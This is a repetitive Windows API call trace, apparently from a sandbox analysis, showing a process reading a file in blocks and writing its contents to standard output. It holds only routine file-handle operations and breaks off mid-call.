[0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.253] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.254] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.254] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] GetFileType (hFile=0x50) returned 0x1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.254] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.255] GetFileType (hFile=0x50) returned 0x1 [0127.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.255] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] GetFileType (hFile=0x50) returned 0x1 [0127.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.256] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.256] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.256] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.257] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] GetFileType (hFile=0x50) returned 0x1 [0127.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.257] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.258] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.258] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.258] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.258] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] GetFileType (hFile=0x50) returned 0x1 [0127.259] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.259] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.260] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.260] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.260] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.261] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.261] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] GetFileType (hFile=0x50) returned 0x1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.261] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.262] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.262] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.262] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] GetFileType (hFile=0x50) returned 0x1 [0127.263] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.263] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.264] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.264] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, 